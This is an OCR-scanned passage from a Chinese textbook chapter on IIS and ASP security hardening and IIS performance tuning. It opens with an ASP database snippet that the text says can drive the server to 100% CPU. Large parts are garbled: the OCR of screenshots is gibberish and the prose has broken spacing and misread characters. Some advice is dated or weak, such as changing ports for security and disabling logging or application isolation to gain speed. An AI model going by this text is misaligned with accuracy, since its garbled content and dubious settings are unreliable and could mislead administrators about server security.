<% 

Set connGlobal = server. createobject("ADODB. Connection") 
connGlobal. Open "DRIVER = {Microsoft Access Driver (* .mdb)); 
DBQ = d:\data\misc. mdb" 

mSQL = "arb SQL Statement" 

set rsGlobal = connGlobal. execute(mSQL) 
While not rsGlobal. eof 

Response. Write rsGlobal("resultfrommiscdb") 
rsGlobal. movenext 

Wend 

' 这 里 关闭 了 数据 连接 

rsGlobal. close 

Set rsGlobal = nothing 

connGlobal. close 

Set connGlobal = nothing 

%> 


在 这 种 情况 下 ,JIS 处 理 进 程 将 会 停止 ,CPU 使 用 率 由 于 inetinfo. exe 进程 将 达到 
100%, 只 有 重新 启动 计算 机 才能 恢复 。 


8.4 ASP 安全 建议 


IIS 作为 当今 流行 的 Web 服务 器 之 一 ,提供 了 强大 的 Internet 和 Intranet 服务 功能 ,如 
何 加 强 IIS 的 安全 机 制 ,建立 一 个 高 安全 性 能 的 Web 服务 器 ,已 成 为 IIS 设置 中 不 可 忽视 的 


重要 组 成 部 分 。 
84.1 以 Wndows NT 的 安全 机 制 为 基础 


作为 运行 在 Windows NT 操作 系统 环境 下 的 IIS, 其 安全 性 也 应 建立 在 Windows NT 
安全 性 的 基础 之 上 。 


1. 应 用 NTFS 文件 系统 
NTFS 可 以 对 文件 和 目录 进行 管理 ,而 FAT( 文 件 分 配 表 ) 文 件 系 统 只 能 提供 共享 级 的 
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安全 ,建议 在 安装 Windows NT 时 使 用 NTFS 系统 。NTFS 权限 是 Web 服务 器 安全 性 的 
基础 , 它 定义 了 一 组 用 户 访问 文件 和 目录 的 不 同 级 别 。 当 拥有 Windows NT 有 效 账 号 的 用 
户 试 图 访问 一 个 有 权限 限制 的 文件 时 ,计算 机 将 检查 文件 的 访问 控制 表 (ACL)。 该 表 定 义 
了 不 同 用 户 和 用 户 组 所 被 赋予 的 权限 。 例 如 Web 服务 器 上 的 Web 应 用 程序 的 所 有 者 需要 
有 更 多 权限 来 查看 、 更 改 和 删除 应 用 程序 的 . asp 文件 。 但 是 访问 该 应 用 程序 的 公共 用 户 应 
仅 被 授予 只 读 权限 ,以 便 将 其 限制 为 只 能 查看 而 不 能 更 改 应 用 程序 的 Web 页 。 


2. 安装 NT 最 新 的 补丁 


一 般 来 说 Microsoft 公司 都 会 及 时 地 公布 最 新 的 漏洞 和 补丁 。 读者 可 以 访问 
http://windowsupdate. microsoft. com, 自 行 寻 找 所 需 的 补丁 。 目 前 IIS 最 新 版 本 是 6. 0， 
安装 Windows 2003 操作 系统 时 会 默认 安装 IIS 6. 0。 


3. 设置 访问 目录 的 权限 


对 目录 设置 不 同 的 属性 ,如 Read( 读 ) 、Execute( 执 行 )、Script( 脚 本 )。 

用 户 可 以 通过 配置 Web 服务 器 的 权限 来 限制 所 有 用 户 查看 、 运 行 和 操作 ASP 页 。 不 
同 于 NTFS 权限 提供 的 控制 特定 用 户 对 应 用 程序 文件 和 目录 的 访问 方式 , Web 服务 器 权限 
应 用 于 所 有 用 户 ,并 且 不 区 分 用 户 账 号 的 类 型 。 对 于 要 运行 ASP 应 用 程序 的 用 户 ,在 设置 
Web 服务 器 权限 时 ,必须 遵循 下 列 原 则 。 

对 包含 . asp 文件 的 虚拟 目录 允许 * 读 ?或 “脚本 权限。 对 . asp 文件 和 其 他 包含 脚本 的 
文件 (如 . htm 文件 等 ) 所 在 的 虚 目 录 人 允许 “ 读 ”" 和 “脚本 ”权限 。 对 包含 . asp 文件 和 其 他 需要 
“执行 ?权限 才能 运行 的 文件 (如 .exe 和 . dll 文件 等 ) 的 虚 目 录 , 人 允许 “ 读 ” 和 “执行 "权限 。 具 
体操 作 可 以 在 如 图 8. 2 所 示 界 面 中 实现 。 


4. 系统 管理 员 账 号 更 改 


域 用户 管 理 器 虽 可 限制 猜测 口令 的 次 数 ,但 对 保护 系统 管理 员 账 号 却 没 有 作用 ,这 可 能 
给 非法 用 户 带 来 攻击 管理 员 账 号 口令 的 机 会 ,通过 域 用 户 管理 器 给 管理 员 账 号 更 名 不 失 为 
一 种 好 办 法 。 具 体 设置 如 下 : 右 击 “我 的 电脑 "在 弹出 的 快捷 菜单 中 选择 “管理 "命令 ,在 “计算 
机 管理 ”属性 窗口 中 单 击 “ 系 统 工具 ”|“ 本 地 用 户 和 组 用 户 ”, 在 右 侧 用 户 列表 中 , 右 击 一 个 选择 
的 用 户 , 在 弹出 的 快捷 菜单 中 选择 “ 重 命名 "命令 修改 用 户 名 称 , 具 体操 作 如 图 8.4 所 示 。 


5. 关闭 没有 用 的 服务 和 协议 


对 于 IIS 服务 ,无 论 是 WWW 站 点 .FTP 站 点 ,还 是 NNTP、SMTP 服务 都 有 各 自 监听 
和 接收 浏览 器 请 求 的 TCP 端口 号 (Post) ,一 般 常 用 的 端口 号 为 : WWW 是 80,FTP 是 21， 
SMTP 是 25。 可 以 通过 修改 端口 号 来 提高 IIS 服务 器 的 安全 性 。 只 有 知道 端口 号 的 用 户 才 
可 以 访问 。 

建议 关闭 相应 的 协议 端口 。 在 TCP/IP 的 属性 对 话 框 中 选中 “Internet 协议 (TCP/ 
IP)” 复 选 框 , 单 击 “ 属 性 ”按钮 ,如 图 8.5 所 示 。 在 弹出 的 属性 对 话 框 中 单 击 “ 高 级 ”按钮 , 弹 
出 “高 级 TCP/IP 设置 "属性 对 话 框 ,如 图 8.6 所 示 。 在 如 图 8. 6 所 示 对 话 框 中 单 击 “ 选 项 ” 
标签 ,然后 单 击 “ 属 性 ”按钮 ,弹出 *TCP/IP 筛选 "属性 对 话 框 ,如 图 8. 7 所 示 。 在 如 图 8.7 
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局 文件 四 操作 向 查看 W) 窗口 和 帮助 中 | = 


生字 | 外 四 |X 轩 图 | 多 
[大 计算 机 管理 本地 ) 
日 地 系统 有 具 


管理 计算 机 ( 域 ) 的 内 置 帐 户 


四 回 事件 查 看 器 一 pr 计算 机 帐户 用 于 运行 ASP. WET 辅助 进程 (as， 

用 - 凤 ] 共 享 文件 夫 oy 

日 七 本 地 用 户 和 组 Micre DCs Deplo... This user account is used by 
习 用 P 供 来 宾 访问 计算 机 或 访问 域 的 内 
合租 het 来 宾 帐 户 匿名 访问 Internet 信息 服务 的 

田 - 翻 性 能 日 志和 警报 进程 帐户 用 于 启动 进程 外 应 用 程序 的 Int 
设备 管理 器 pueeer This user account is used by. 


田 外 存储 Ee 
田 急于 aaar 这 是 一 个 帮助 和 支持 服务 的 提供 .… 


重 命 名 当前 选择 。 


8.4 修改 用 户 名 称 


中 可 以 禁止 UDP, 然 后 开启 IP 端口 6 和 TCP 端口 80 ,当然 是 否 关 闭 这 些 端口 要 根据 实际 
情况 而 定 。 


了 引 x| 
到 设置 |mms |wrms 这 项 | 
由 同 eee): 

第 规 | 验证 | 高 级 | 

连接 时 使 用 

[3 SS 900 PCI Past Ethernet My [REC | 

属性 他 ) 
者 : 
TCP/IP ie Windows 计算 机 的 
) TE/IP 
安装 辐 . 拖 瑶 QW) 属性 @B) | 
说 明 


厂 连接 后 在 通知 区 域 显示 图 标 外 ) 


碟 此 连接 被 限制 或 无 连接 时 通知 我 0) 
We | mw | 取消 
图 8.5 “本 地 连接 属性 ”选项 卡 图 8.6 “高 级 TCP/IP 设置 "选项 卡 


管理 员 可 以 通过 构造 目标 站 NetBIOS 名 与 其 IP 地 址 之 间 的 映像 ,对 Internet 上 的 其 
他 服务 器 进行 管理 ,非法 用 户 也 可 从 中 找到 可 乘 之 机 。 如 果 这 种 远程 管理 不 是 必需 的 ,可 以 
停止 该 服务 。 


6. 维护 Global. asa 的 安全 


为 了 充分 保护 ASP 应 用 程序 ,一 定 要 在 应 用 程序 的 Global. asa 文件 上 为 适当 的 用 户 或 
用 户 组 设置 NTFS 文件 权限 。 如 果 Global. asa 包含 向 浏览 器 返回 信息 的 命令 而 用 户 没 有 
保护 Global. asa 文件 , 则 信息 将 被 返回 给 浏览 器 ,即便 应 用 程序 的 其 他 文件 被 保护 。 
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可 
他 全 部 允许 到 ) 个 全 部 允许 中) G 全 部 人 允许) 
个 只 允许 们 一 一 个 只 允许 如 一 一 个 只 允许 一 


| WP 访 品 
源 加 潜 加 | 肖 加 
Eladty 映 辽 名) | bledtd 


Cm |] we | 


图 8.7 启用 TCP/IP 筛选 功能 


7. 用 户 访问 权限 控制 


(1) 文件 夹 和 文件 的 访问 权限 

对 于 安放 在 NTFS 文件 系统 上 的 文件 夹 和 文件 ,要 对 其 权限 加 以 控制 ,对 不 同 的 用 户 
组 和 用 户 进 行 不 同 的 权限 设置 ; 另外 ,还 可 利用 NTFS 的 审核 功能 对 某 些 特定 用 户 组 成 员 
读 文件 的 企图 等 方面 进行 审核 ,通过 监视 文件 访问 .用 户 对 象 的 使 用 等 方式 发 现 非法 活动 的 
前 兆 , 及 时 加 以 预防 。 

(2) WWW 目录 的 访问 权限 

已 经 设置 成 Web 目录 的 文件 夹 , 可 以 通过 操作 Web 站 点 属性 页 实现 对 WWW 目录 访 
问 权 限 的 控制 ,而 该 目录 下 的 所 有 文件 和 子 文件 夹 都 将 继承 这 些 安全 性 。WWW 服务 除了 
提供 NTFS 文件 系统 提供 的 权限 外 ,还 提供 读 取 权 限 及 访问 的 IP 地 址 限制 等 ,在 如 图 8. 2 
所 示 对 话 框 中 单 击 “ 目 录 安 全 性 ”标签 ,弹出 图 8. 8 所 示 对 话 框 ,用 户 可 以 进行 “身份 验证 和 
访问 控制 "和 *IP 地 址 和 域名 限制 "等 操作 。 


加 到 
RM 站 | 和 | 。 IsAET 往 克 器 | 主 上 录 | 文档 
MIP 头 ”| 。 自 定义 锚 误 。 | 。 ASP.NET 


< a RERE gE) 
碍 秦 证 书 (W) 


编辑 四 ) 


确定 取消 |。 本 用 多 帮助 


图 8.8 在 IIS 管 理 器 中 设置 访问 权限 


167 


168 


络 与 信息 安全 基础 


842 利用 IIS 安全 机 制 


虽然 Microsoft 公司 对 IIS 6. 0 进行 了 很 多 安全 方面 的 改进 ,但 是 仍 不 能 控制 用 户 自己 
编写 程序 的 安全 性 ,需要 网 站 管理 人 员 进 行 符合 用 户 需要 的 安全 配置 。 


1. 安装 时 应 注意 的 安全 问题 


(1) 避免 安装 在 主 域 控制 器 上 

在 安装 IIS 之 后 ,将 在 安装 的 计算 机 上 生成 ITUSR_Computername 匿名 账户 ,该 账户 被 
添加 到 域 用 户 组 中 ,从 而 把 应 用 于 域 用 户 组 的 访问 权限 提供 给 访问 Web 服务 器 的 每 个 匿名 
用 户 ,这 不 仅 给 IIS 带 来 巨大 的 潜在 危险 ,而 且 还 可 能 危及 整个 域 资源 的 安全 ,要 尽 可 能 避 
免 把 IIS 安装 在 域 控制 器 尤其 是 主 域 控制 器 上 。 

(2) 避免 安装 在 系统 分 区 上 

把 IIS 安放 在 系统 分 区 上 ,会 使 系统 文件 与 IIS 同样 面临 非法 访问 ,容易 使 非法 用 户 攻 
击 系统 分 区 。 


2. 用 户 控制 的 安全 性 


(1) 匿名 用 户 

安装 IIS 后 产生 匿名 用 户 IJUSR_Computername( 密 码 随 机 产生 ) ,其 匿名 访问 会 给 Web 
服务 器 带 来 潜在 的 安全 问题 ,应 对 其 权限 加 以 控制 。 如 没有 匿名 访问 需要 ,可 取消 Web 的 
匿名 服务 。 在 如 图 8. 8 所 示 对 话 框 中 单 击 * 身 份 验证 和 访问 控制 ?选项 组 中 的 “编辑 按钮 ， 
弹出 如 图 8. 9 所 示 的 对 话 框 。 选 中 * 启 用 匿名 访问 ? 复 选 框 即 可 。 


身份 验证 方法 x 


3 匿 : 下 列 Windows 用 户 帐户 : 
用 PW: FST EE 
密码 全 ): rr 二 | 


厅 集成 Windovs 身份 验证 0D 
厂 Windows 域 服务 器 的 摘要 式 身 份 验证 CI) 


厂 基本 身份 验证 (以 明文 形式 发 送 密码 ) E) 
厂 .NET Passport 身份 验证 上) 


默认 成 四 | ll 
领域 0 ee 


图 8.9 禁止 网 站 的 匿名 访问 


(2) 一 般 用 户 
通过 使 用 数字 与 字母 (包括 大 小 写 ) 相 结合 的 口令 ,提高 修改 密码 的 频率 ,封锁 失败 的 登 
录 尝 试 以 及 设置 账户 的 有 效 期 等 办 法 对 一 般 用 户 账户 进行 管理 。 
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3. 登录 认证 的 安全 性 


IIS 服务 器 提供 对 用 户 三 种 形式 的 身份 认证 。 

(1) 匿名 访问 

不 需要 与 用 户 之 间 进 行 交互 ,允许 任何 人 匿名 访问 站 点 , 它 在 这 三 种 身份 认证 中 的 安全 
性 是 最 低 的 。 

(2) 基本 (basic) 验 证 

在 此 方式 下 用 户 输入 的 用 户 名 和 口令 以 明文 形式 在 网 络 上 传输 ,没有 任何 加 密 ,非法 用 
户 可 以 通过 网 上 监听 来 拦截 数据 包 , 并 从 中 获取 用 户 名 及 密码 ,安全 性 能 一 般 。 

(3) Windows 2000 请 求 /响应 方式 

浏览 器 通过 加 密 方式 与 IIS 服务 器 进行 交流 ,有 效 地 防止 了 窃听 活动 ,是 安全 性 比较 高 
的 认证 形式 。 


4. IP 地 址 的 控制 


JIS 可 以 设置 允许 或 拒绝 从 特定 IP 发 来 的 服务 请 求 ,有 选择 地 允许 特定 结 点 的 用 户 访 
问 服务 ,可 以 通过 设置 来 阻止 除 指定 IP 地 址 外 的 整个 网 络 用 户 来 访问 Web 服务 器 。 具 体 
设置 : 启动 Internet 信息 服务 器 (IIS) 管 理 器 ,选择 需要 配置 的 网 站 , 右 击 * 属 性 ”, 在 弹出 的 
快捷 菜单 中 选择 打开 “目录 安全 性 ”选项 卡 , 单 击 IP 地 址 和 域名 限制 "命令 进行 指定 IP 地 
址 的 控制 设置 ,如 图 8. 10 所 示 。 


NetworkYeb 压 性 CD 
网 站 | 性 能 | IsSAT 第 # 器 | 主 8 录 | 文告 | 
目录 安全 性 | GTP 头 1 自 定义 错误 1 
身份 验证 和 访问 控制 - 
区 各 访问 区 源 及 如 加 身份 妆 证 方 
Ds 编辑 亿 ) 
?地 址 和 域名 限制 一 
8 期 并 et 二 各 本 机 攻 
一 安全 通信 
a REE 。 服务 加 芽 吕 0 
查看 证 书 咏 
护 辑 由 


确定 取消 启用 而 |。 帮助 
图 8.10 设置 网 站 的 全 地 址 


5. 删除 无 用 的 映射 


在 JIS 管理 器 中 删除 无 用 映射 ,一般 情况 下 保留 ASP、ASA 两 个 映射 就 够 了 ,其 余 的 映 
射 都 可 以 删除 ,操作 如 图 8. 3 所 示 , 最 后 单 击 “ 确 定 ” 按 钮 保存 设置 。 
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6. 不 要 把 密码 和 物理 路 径直 接 写 在 程序 中 


很 难保 证 用 户 的 ASP 程序 不 会 被 人 拿 到 ,即使 用 户 安装 了 最 新 的 补丁 。 为 了 安全 起 
见 , 应 该 把 密码 和 用 户 名 保存 在 数据 库 中 ,使 用 虚拟 路 径 。 


7. 在 程序 中 记录 用 户 的 详细 信息 


在 程序 中 记录 用 户 的 详细 信息 ,这 些 信息 包括 用 户 的 浏览 器 、 用 户 停 留 的 时 间 、 用 户 IP 
等 。 其 中 记录 IP 是 最 有 用 的 。 

可 用 下 面 的 语句 了 解 客户 端 和 服务 端的 信息 。 

<Table> 

< % for each name in request. servervariables$% > 

< 

<td><% = nameg% 二: 一 /td> 

<td><% = request. servervariables(name) % ></td> 

</tr> 

<%next%> 

</Table> 


记录 了 用 户 的 IP, 就 能 通过 追踪 来 访 用 户 的 具体 地 点 。 


如 果 用 户 通过 代理 来 浏览 网 页 ,上 面 的 方法 只 能 看 到 用 户 代理 的 IP, 而 不 能 记录 用 户 
真实 的 IP。ASP 没有 提供 查看 客户 端 网 卡 物理 地 址 ( 即 MAC) 的 功能 。 


8. Cookie 安全 性 


ASP 使 用 SessionID Cookie 跟踪 应 用 程序 访问 或 会 话 期 间 特 定 的 Web 浏览 器 的 信息 。 
这 就 是 说 , 带 有 相同 Cookie 的 HTTP 请 求 被 认为 是 来 自 同一 Web 浏览 器 。Web 服务 器 可 
以 使 用 SessionID Cookies 配置 带 有 用 户 特 定 会 话 信 息 的 ASP 应 用 程序 。 例 如 ,如 果 用 户 
的 应 用 程序 是 一 个 允许 选择 和 购买 CD 唱 盘 的 联机 音乐 商店 ,就 可 以 用 SessionID 跟踪 用 户 
漫游 整个 应 用 程序 时 的 选择 。 

为 了 防止 计算 机 黑客 猜 中 SessionID Cookie 并 获得 对 合法 用 户 的 会 话 变量 的 访问 ， 
Web 服务 器 为 每 个 SessionID 指派 一 个 随机 生成 号 码 。 每 当 用 户 的 Web 浏览 器 返回 一 个 
SessionID Cookie 时 ,服务 器 取出 SessionID 和 被 赋予 的 数字 ,检查 是 否 与 存储 在 服务 器 上 
的 生成 号 码 一 致 。 若 两 个 号 码 一 致 ,将 允许 用 户 访问 会 话 变 量 。 这 一 技术 的 有 效 性 取决 于 
被 赋予 的 数字 的 长 度 (64 位 ) ,此 长 度 使 计算 机 黑客 猜 中 SessionID 从 而 窃取 用 户 的 活动 会 
话 的 可 能 性 几乎 为 零 。 

截获 了 用 户 SessionID Cookie 的 计算 机 黑客 可 以 使 用 此 Cookie 假冒 该 用 户 。 如 果 
ASP 应 用 程序 包含 私人 信息 、 信 用 卡 或 银行 账户 号 码 , 拥 有 窃取 的 Cookie 的 计算 机 黑客 就 
可 以 在 应 用 程序 中 开始 一 个 活动 会 话 并 获取 这 些 信息 。 用 户 可 以 通过 对 自己 的 Web 服务 
器 和 用 户 的 浏览 器 间 的 通信 和 链 路 进行 加 密 来 防止 SessionID Cookie 被 截获 。 


9. SSL 安全 机 制 
IIS 的 身份 认证 除了 匿名 访问 、 基 本 验证 和 Windows NT 请 求 / 响 应 方式 外 ,还 有 一 种 


第 8 章 ASP 和 ASP.NET 的 安全 技 加 


安全 性 更 高 的 认证 : 通过 SSL 安全 机 制 使 用 数字 证 书 。 
SSL 位 于 HTTP 层 和 TCP 层 之 间 , 用 于 建立 用 户 与 服务 器 之 间 的 加 密 通 信 ,确保 所 传 
输 信息 的 安全 。SSL 是 工作 在 公共 密 钥 和 私人 密 钥 基础 上 的 ,任何 用 户 都 可 以 获得 公共 密 
钥 来 加 密 数 据 , 但 解密 数据 必须 要 通过 相应 的 私人 密 钥 。 使 用 SSL 安全 机 制 时 ,客户 端 与 
服务 器 建立 连接 ,服务 器 把 它 的 数字 证 书 与 公共 密 钥 一 并 发 送 给 客户 端 ,客户 端 随机 生成 会 
话 密 钥 , 用 从 服务 器 得 到 的 公共 密 钥 对 会 话 密 钥 进行 加 密 , 并 把 会 话 密 钥 通 过 网 络 传输 给 服 
务 器 ,而 会 话 密 钥 只 有 在 服务 器 端 用 私人 密 钥 才能 解密 。 这 样 客户 端 和 服务 器 端 就 建立 了 
-个 唯一 的 安全 通道 。 具 体 步骤 如 下 : 在 如 图 8. 8 所 示 对 话 框 中 , 单 击 “ 安 全 通信 ”中 的 “ 服 
务 器 证 书 ” 按 钮 ,可 以 生成 新 的 证 书 ,如 图 8. 11 所 示 ; 单 击 “ 编 辑 ” 按 钮 弹出 “安全 通信 ”对 话 
框 ,如 图 8. 12 所 示 , 用 户 可 以 修改 证 书 的 使 用 方式 和 权限 。 


| 
欢迎 使 用 Web 服务 器 证 书 向 导 


悠 自 建 并 管理 服务 器 证 书 ， 可 以 合用 服 
在 服务 器 与 客 尸 靖 之 间 建 立 安全 的 Web 通 


Web 服务 器 状态 
Web 服 备 器 设 有 安装 证 书 ， 有 任何 挂 起 的 请 求 。 
te 亲口 Yeb i 


单 击 “ 下 一 步 ”按钮 继续 。 


—™w | 


图 8.11 设置 网 站 的 服务 证 书 


Ed 
厂 要 季 SD) 加 
厂 要 
客户 端 证 节 


G 丫 略 客户 端 证书 @) 
个 接受 客户 端 证 书 A) 
个 要求 大 户 峭 下 


厂 启用 客户 端 证 书 映射 4 


Oe Re 
BE 


有 
厂 启用 证 书信 任 列表 o 
CD | 已 | 
旨 建 Cd 
CC 达 |] _ 帮助 0 


图 8.12 客户 端 证 书 设置 页 
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建立 了 SSL 安全 机 制 后 ,只 有 SSL 允许 的 客户 才能 与 SSL 允许 的 Web 站 点 进行 通信 ， 
并 且 在 使 用 URL 资源 定位 器 时 ,输入 https:// ,而 不 是 http://。 
SSL 安全 机 制 的 实现 ,将 增 大 系统 开销 ,增加 服务 器 CPU 的 负担 ,降低 系统 性 能 ,在 规 
划 时 建议 仅 考虑 在 高 敏感 度 的 Web 目录 中 使 用 。 
10. 使 用 IIS 备份 功能 
可 以 使 用 IIS 的 备份 功能 ,将 对 IIS 的 安全 设置 全 部 备份 下 来 ,以 便 随 时 恢复 。 在 如 
图 8. 1 所 示 窗 口中 选择 “Internet 信息 服务 (IIS) 管 理 器 ”|* 网 站 ?下 的 任意 网 站 右 击 ,在 弹出 
的 快捷 菜单 中 选择 “所 有 任务 ”|“ 将 配置 保存 到 一 个 文件 ”选项 ,在 配置 保存 对 话 框 中 为 备份 
的 文件 起 名 为 backup, 如 图 8. 13 所 示 。 
可 
文件 名 四; [bscp 
本 多国 norstyrtwsznetsy 。。。。 浏 史 四 
厂 用 密码 对 配置 进行 加 密 G) 
密码 5 | == 
确认 灾 码 呆 | | 
my | Pho 


图 8.13 配置 保存 对 话 框 


除了 Windows 操作 系统 自 带 的 IIS 备份 软件 外 ,在 网 络 上 还 可 以 找到 很 多 IIS 备份 软 
件 ,如 图 8. 14 所 示 的 “IIS 备份 精灵 ”就 是 一 款 比较 流行 的 软件 , 它 具 有 导入 /导出 站 点 及 删 
除 站 点 的 功能 。 


本 
文件 (E) 编辑 (E) 帮助 (H) 


导出 站 点 下) 导入 站 点 加 ) 删除 站 点 G) 


图 8.14 “IIS 备份 精灵 ”界面 


在 如 图 8. 14 所 示 窗 口中 ,选择 “文件 ”1“IIS 配置 信息 浏览 器 ”选项 ,弹出 “IIS 配置 信息 
浏览 器 ”窗口 ,如 图 8. 15 所 示 , 用 户 可 以 轻松 地 查看 自己 网 站 的 配置 信息 ,这 对 于 管理 很 多 
网 站 的 管理 员 或 虚拟 主机 提供 商 来 说 是 个 很 好 的 功能 。 
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图 8.15 “IIS 配置 信息 浏览 器 ”窗口 


11. 限制 IIS 的 使 用 性 能 


如 果 怕 IIS 负荷 过 高 导致 服务 器 满 负荷 死机 ,也 可 以 用 性 能 限制 IS 的 使 用 性 能 ,在 如 
图 8. 1 所 示 窗 口中 选择 “Internet 信息 服务 (IIS) 管 理 器 ”|* 网 站 ?选项 后 , 右 击 任意 网 站 ,在 
弹出 的 快捷 菜单 中 选择 “属性 ”命令 , 单 击 “ 性 能 "标签 ,选中 “限制 网 站 可 以 使 用 的 网 络 带 宽 ” 
复 选 框 和 “网 站 连接 "区域 中 的 “连接 限制 为 " 单 选 按 钮 ,设置 IIS 的 使 用 性 能 ,如 图 8. 16 
所 示 。 


Ed| 
一 
网 站 性 能 。 | TsApr 第 器 | 主 上 录 | 。 文档 
带宽 限制 
友 限制 网 站 可 以 使 用 的 网 络 带 宽 (L) 


Ce ] ws | saw | ww | 
8.16 设置 IIS 使 用 性 能 


实际 上 ,安全 和 应 用 在 很 多 时 候 是 相互 矛盾 的 ,因此 ,需要 在 两 者 之 间 找 到 平衡 点 ,毕竟 
服务 器 是 给 用 户 用 的 ,而 不 是 做 OpenHack 的 (2001 年 ,OpenHack 公司 公开 向 黑客 叫板 ， 
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欢迎 黑客 对 其 网 站 进行 攻击 ,并 对 攻 入 不 同 级 别 系统 的 人 给 予 不 同 程度 的 奖励 。7 天 来 , 黑 
客 终于 攻破 了 一 个 电子 商务 平台 。 网 站 的 其 他 部 分 ,如 网 络 服务 器 、 邮 件 服务 器 及 数据 库 ， 
现在 都 还 安然 无 善 。 但 黑客 们 仍 在 加 紧 攻 击 ) ,如果 安 全 原则 妨碍 了 系统 应 用 ,那么 这 个 安 
全 原则 不 是 好 的 原则 。 

网 络 安 全 是 一 项 系统 工程 , 它 不 仅 有 空间 的 跨度 ,还 有 时 间 的 跨度 。 很 多 系统 管理 员 认 
为 进行 了 安全 配置 的 主机 就 是 安全 的 ,但 是 只 能 说 一 台 主机 在 一 定 的 情况 一 定 的 时 间 上 是 
安全 的 , 随 着 网 络 结构 的 变化 .新 的 漏洞 的 发 现 以 及 管理 员 / 用 户 的 操作 等 ,主机 的 安全 状况 
是 随时 随地 变化 着 的 ,只 有 让 安全 意识 和 安全 制度 贯穿 整个 过 程 才能 做 到 真正 的 安全 。 


8.5 提高 IIS 5.0 的 执行 效率 


管理 和 使 用 IIS 5. 0 的 管理 员 经 常会 抱怨 他 们 的 网 站 服务 器 的 执行 效率 不 高 。 下 面 提 
供 一 些 提高 IIS 执行 效率 的 方法 。 


85.1 启用 HTTP 的 持续 作用 


启用 HTTP 的 持续 作用 (Keep-Alive) 时 ,IIS 与 浏览 器 的 连接 不 会 断 线 , 直 到 浏览 器 关 
闭 时 连接 才 会 断 开 。 因 为 处 于 “Keep-Alive” 状 态 时 ,每 次 客户 端 请 求 时 都 不 需 重 新 建立 一 
个 新 的 连接 ,所 以 将 改善 服务 器 的 效率 。 

此 功能 是 为 HTTP 1.1 预 设 的 功能 ,HTTP 1.0 加 上 Keep-Alive Header 也 可 以 提供 
HTTP 的 持续 作用 功能 ; 启用 HTTP 的 持续 作用 可 以 提高 15%~~20% 的 执行 效率 。 

启用 HTTP 的 持续 作用 的 步骤 如 下 : 在 “Internet 服务 管理 员 ” 中 ,选取 整个 IIS 服务 
器 或 Web 站 点 ,然后 单 击 “"Web 站 点 ”标签 ,选中 “启动 保持 HTTP 激活 ? 复 选 框 ,如 图 8. 17 
所 示 。 


webserver 屋 性 [21x] 

| jaIP 头 ”| 。 自 定义 桔 误 信息 。 | 。 服务 器 扩展 
Web 站 点 | 操作 员 | 性 能 。 | TISAEI 第 过 器 | 主 目录 | 文档 
Neb 站 点 标识 


人 启用 保持 JITP 激活 局 ) 


一 到 月 用 日 志 记录 四 ) 
活动 日 志 格式 0 : 
sc 扩充 卓志 文件 格式 可 性 .| 


取消 应 用 此 天助 
图 8.17 启动 HTTP 激活 功能 


第 8 章 ASP 和 ASP. NET 的 安全 技 | 


852 不 启用 日 志 


不 启用 日 志 记 录 可 以 提高 5%~~8% 的 执行 效率 。 
设 定 不 启用 日 志 记 录 的 步骤 如 下 : 在 “Internet 服务 管理 员 ” 中 ,选择 整个 IIS 服务 器 或 
Web 站 点 ,然后 单 击 ”Web 站 点 "标签 ,取消 选中 “启用 日 志 记录 " 复 选 框 ,如 图 8. 18 所 示 。 


EE TI 2 
a 目录 安全 性 。 | 。 ITIP 头 |。 自 定义 情 误 信息 
Web 站 点 操作 员 | 人 性能。 | 。 ISAEI 第 入 器 | 主 上 录 
Web 站 点 标识 
说 明 GE); | 
TP 地 址 加 ): 92. 168.1.1 7] 高 多 人 
TCP 端口 中: 局 SSL 薄 口 叮 
「 连接 
人 无限 四 
个 限 币 QD: 1,000 连接 
连接 超时 0D : 900 秒 
厅 启用 保持 ITF 激活 区) 
EE Ed 
rc 扩充 日 志文 件 格式 司 ， 尾 介面 


取消 应 用 屠 助 
图 8.18 禁止 日 志 记 录 功 能 


853 设 定 非 独立 的 处 理 程序 


使 用 “独立 ”的 处 理 程序 会 降低 20% 的 执行 效率 。 选 择 “ 主 目录 ”|“ 虚 拟 目录 ”选项 ,在 
打开 的 对 话 框 中 ,将 “应 用 程序 保护 选项 ” 设 定 为 “高 "(独立 的 ) 时 ,每 个 网 站 都 处 于 “独立 ”处 
理 程 序 上 ; 把 “应 用 程序 保护 ” 设 定 为 “ 低 ”( 此 时 所 有 的 网 站 程序 使 用 公用 进程 ) 时 ,IIS 的 执 
行 效率 较 高 ,如 图 8. 2 所 示 。 


854 调整 缓存 数量 


IIS 5.0 将 静态 的 网 页 资料 暂 存 在 缓存 (cache) 中 ; IIS 4.0 则 将 静态 的 网 页 资料 暂 存 在 
文件 中 。 调 整 缓存 的 保存 文件 数量 可 以 提高 IIS 的 执行 效率 。 

ASP 指令 文件 执行 过 后 ,会 暂 存在 缓存 中 以 提高 执行 效率 。 增 加 缓存 的 保存 文件 数量 
可 提高 ASP 的 效率 。 

可 以 设 定 整个 IIS 服务 器 或 处 于 “独立 进程 "的 Web 网 站 上 的 缓存 文件 数量 。 

设 定 缓存 功能 的 步 又 如 下 : 在 “Internet 服务 管理 员 ” 中 ,选择 整个 IIS 服务 器 或 Web 
站 点 或 应 用 程序 的 起 始 目 录 , 然 后 单 击 “ 主 目录 ”|“ 配 置 ” 选 项 进入 “应 用 程序 选项 ”进行 设 
置 ,如 图 8. 2 所 示 。 
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855 不 使 用 CGI 程序 


使 用 CGI 程序 时 ,因为 处 理 程序 (process) 须 不 断 地 产生 与 销毁 ,造成 IIS 的 执行 效率 
不 佳 。 一 般 而 言 , 执 行 效率 比较 如 下 : 

。 静态 网 页 (static) ”执行 效率 100%。 

。 ISAPI 执行 效率 50% 。 

。 ASP 执行 效率 10%。 

。 CGI 执行 效率 1%。 

可 见 ASP 比 CGI 可 能 快 10 倍 , 因 此 不 使 用 CGI 程序 可 以 提高 IIS 的 执行 效率 。 以 弹 
性 (flexibility) 为 衡量 标准 ,各 种 技术 的 使 用 效率 比较 如 下 : ASP 字 CGI>ISAPI 二 项 态 网 
页 。 以 安全 (security) 为 衡量 标准 ,各 种 技术 的 使 用 效率 比较 如 下 : 

ASP( 独 立 )= 二 ISAPI( 独 立 )= 二 CGI>ASP( 非 独立 )==ISAPI( 非 独立 )= 静 态 网 页 


856 增加 IIS 50 服 务 器 的 CPU 数量 


根据 Microsoft 公司 的 测试 报告 ,增加 IIS 4. 0 服务 器 的 CPU 个 数 ,执行 效率 并 不 会 提 
高 多 少 ; 但 是 增加 IIS 5. 0 服务 器 的 CPU 个 数 ,执行 效率 几乎 成 正比 地 提高 ,可 以 说 两 个 
